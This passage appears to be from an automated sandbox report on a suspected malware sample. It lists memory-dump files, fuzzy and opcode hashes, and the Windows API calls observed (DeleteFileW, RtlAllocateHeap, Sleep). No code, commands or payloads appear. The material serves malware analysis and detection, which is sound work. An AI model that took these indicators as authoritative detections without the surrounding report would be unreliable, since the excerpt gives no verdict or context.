                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5415cac3792675ee4302364e37136f80a1beed59f6e6edd98e3772f5f6604e63
                                                                                                                                                                                  • Instruction ID: 5104692479e455b793e74a3cd990c2e948bb5b42b2bc03d26266c10521ee8cef
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5415cac3792675ee4302364e37136f80a1beed59f6e6edd98e3772f5f6604e63
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3191F630E00109AFDF08FFA8DC85BEEBBB9EF45308F504169E411A7281D7746A46CBA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00C8EC64
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                                  • Opcode ID: bddb8bdfe38e38d49e6657d9be3fd0bd009136c52d77404090b877ce41ef5214
                                                                                                                                                                                  • Instruction ID: ff89a10dc9709dd4319b427185c64da5cb99accfbb25a29f1517c85553234c39
                                                                                                                                                                                  • Opcode Fuzzy Hash: bddb8bdfe38e38d49e6657d9be3fd0bd009136c52d77404090b877ce41ef5214
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7021F6B1A003049FD724EF38D881667B7E8FF14358B100A3EE85AC7641E7B1EA54C7A5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9275E
                                                                                                                                                                                    • Part of subcall function 00C97645: DeleteFileW.KERNEL32(?,?,00C92752,?), ref: 00C9764D
                                                                                                                                                                                    • Part of subcall function 00C97645: __dosmaperr.LIBCMT ref: 00C9765E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DeleteFile__dosmaperr_free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2668308924-0
                                                                                                                                                                                  • Opcode ID: fea36864478443584411032991ad0371886433da81838ce4a1afd7575e3c5e7e
                                                                                                                                                                                  • Instruction ID: 42b987fe6751b8049ed12244c49bf72d62e26715bbdf8959060de49bc3e26d5f
                                                                                                                                                                                  • Opcode Fuzzy Hash: fea36864478443584411032991ad0371886433da81838ce4a1afd7575e3c5e7e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B018171D05219BECF00ABF8DC4A7AEBBF4AB04314F140166F864F21D2EA708A44D791
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00C8E3EC), ref: 00C96B1C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                  • Opcode ID: bf280770fe784cf005f354c34acc70b6d5deacc6263725f3f4d183a9d9e18092
                                                                                                                                                                                  • Instruction ID: 5710bfe89900ab9223c720c498d2acb0b3ba3aa38490f286be2f2dd7378df34a
                                                                                                                                                                                  • Opcode Fuzzy Hash: bf280770fe784cf005f354c34acc70b6d5deacc6263725f3f4d183a9d9e18092
                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E09231245665ABEF312B669C0DF9A3EC8EF513A1F150220EC25D71D1FF60DE01B2A1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                  • Opcode ID: 90133e6a51d4ce7df737665365d67a25c38a2bed0125c3a2b06776427bc823ae
                                                                                                                                                                                  • Instruction ID: e89327fe155c38ca2a06dcb629a6de7a550a3090fb6c46990d61abccdd0edd8e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90133e6a51d4ce7df737665365d67a25c38a2bed0125c3a2b06776427bc823ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57E0C726F4002033880032BE0C23A3E38111AC3B6CB981AA8E8463B3D3EC401A2123EF
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                  • Opcode ID: cbecfd68605ee6ec02be469150c7fa511fc8edda43b44770342120947553d663
                                                                                                                                                                                  • Instruction ID: 8e627fe353d804c3597afd2859b0d06a3891ed40856611597bc4817b74ed85c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: cbecfd68605ee6ec02be469150c7fa511fc8edda43b44770342120947553d663
                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE01756F4006073981532BD5D27A3E39155AD3B6CB991AACE8863B3D3ED411A2123EF
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                  • Opcode ID: 606242c054204ae66ee1d5ac015b7c267667917eb359a030176415ed1e0dac4d
                                                                                                                                                                                  • Instruction ID: 8c7e15def42eb35670951c7775bb5021cdffb371c02a8840ee722c75046e53ca
                                                                                                                                                                                  • Opcode Fuzzy Hash: 606242c054204ae66ee1d5ac015b7c267667917eb359a030176415ed1e0dac4d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E0C219F0015033441432BD1C33A3E38111AC3B6CB981598EC423B3D3EC401E1113EF
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
